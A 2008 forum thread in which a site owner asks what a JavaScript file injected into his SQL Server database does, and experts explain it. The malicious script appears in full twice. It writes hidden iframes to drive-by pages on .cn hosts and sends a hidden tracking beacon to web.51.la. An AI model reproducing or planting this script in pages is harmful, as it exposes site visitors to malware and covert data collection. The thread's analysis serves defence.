Solved

sql injection js script, can someone tell me what this is doing?

Posted on 2008-06-09
3
910 Views
Last Modified: 2008-06-10
Our SQL Server DB was infected with some sort of SQL injection - I downloaded th .js and it is as follows:

document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");

if (navigator.systemLanguage=='zh-cn')
{

}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}



window.onerror=function(){return true};
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;var a3327sf=document.referrer;var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netscape"){a3327color=screen.pixelDepth;} else {a3327color=screen.colorDepth;}<\/script><script>a3327tf=top.document.referrer;<\/script><script>a3327pu =window.parent.location;<\/script><script>a3327pf=window.parent.document.referrer;<\/script><script>a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3327ops=(a3327ops==null)?1: (parseInt(unescape((a3327ops)[2]))+1);var a3327oe =new Date();a3327oe.setTime(a3327oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3327ot==null){a3327ot=1;}else{a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();<\/script><script>a3327of=a3327sf;if(a3327pf!=="51la"){a3327of=a3327pf;}if(a3327tf!=="51la"){a3327of=a3327tf;}a3327op=a3327pu;try{lainframe}catch(e){a3327op=a3327su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');

Could someone tell me exactly what this is doing?

Thanks in advance.
0
Comment
Question by:samic400
  • 2
3 Comments
 
LVL 6

Expert Comment

by:ysfx
ID: 21744909
Looks like code that sites use to track traffic from a different domain. My guess that this an attempt to circumvent sites that publish user inputs like blogs and feedbacks.
0
 
LVL 3

Accepted Solution

by:
NizzeK earned 500 total points
ID: 21748375
You are not alone with this problem:
http://www.daniweb.com/forums/post614041.html
This is a Chinese attempt to gather information for malicious use.
See: http://www.sudosecure.net/archives/83

The code checks you pages and creates cookies (AJSTAT_ok_pages/AJSTAT_ok_times) with time stamp and availability information. Then it is printed in disguise of a utility, sending the collected information and identity to the data collector at web.51.la.
The code itself is not harmful, but it could reveal something unwanted.
I have reformatted the code to see the structure easier.

Best regards
Nils


document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
 

if (navigator.systemLanguage=='zh-cn')

{
 

}

else{

document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");

}
 

window.onerror=function(){return true};

document.write ('

	<script>

		var a3327tf="51la";

		var a3327pu="";

		var a3327pf="51la";

		var a3327su=window.location;

		var a3327sf=document.referrer;

		var a3327of="";

		var a3327op="";

		var a3327ops=1;

		var a3327ot=1;

		var a3327d=new Date();

		var a3327color="";

		if (navigator.appName=="Netscape")

			     {a3327color=screen.pixelDepth;} 

			else {a3327color=screen.colorDepth;}

	<\/script>

	<script>

		a3327tf=top.document.referrer;

	<\/script>

	<script>

		a3327pu =window.parent.location;

	<\/script>

	<script>

		a3327pf=window.parent.document.referrer;

	<\/script>

	<script>

		a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));

		a3327ops=(a3327ops==null)?1:(parseInt(unescape((a3327ops)[2]))+1);

		var a3327oe =new Date();

		a3327oe.setTime(a3327oe.getTime()+60*60*1000);

		document.cookie="AJSTAT_ok_pages="+a3327ops+ ";

			path=/;

			expires="+a3327oe.toGMTString();

		a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));

		if (a3327ot==null)

			     {a3327ot=1;}

			else {a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}

		a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);

		document.cookie="AJSTAT_ok_times="+a3327ot+";

			path=/;

			expires="+a3327oe.toGMTString();

	<\/script>

	<script>

		a3327of=a3327sf;

		if (a3327pf!=="51la")

			     {a3327of=a3327pf;}

		if(a3327tf!=="51la")

			     {a3327of=a3327tf;}

		a3327op=a3327pu;

		try{lainframe}catch(e){a3327op=a3327su;}

		document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'

			+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'

			+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');

	<\/script>');

Open in new window

0
 
LVL 3

Expert Comment

by:NizzeK
ID: 21748394
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808
0

Featured Post

IT, Stop Being Called Into Every Meeting

Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

Join & Write a Comment

Today I would like to talk about localizing (Internationalization) JavaScript applications. Introduction When creating an application that is going to be used by many people around the globe, it is important to remember that not everyone speak…
This article will give core knowledge of JavaScript and will head in to your first JavaScript program. I am Durvesh Naik and I am here to deal with this series of JavaScript. I will teach you JavaScript in part wise , as its quite boring to read big…
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…

759 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

18 Experts available now in Live!

Get 1:1 Help Now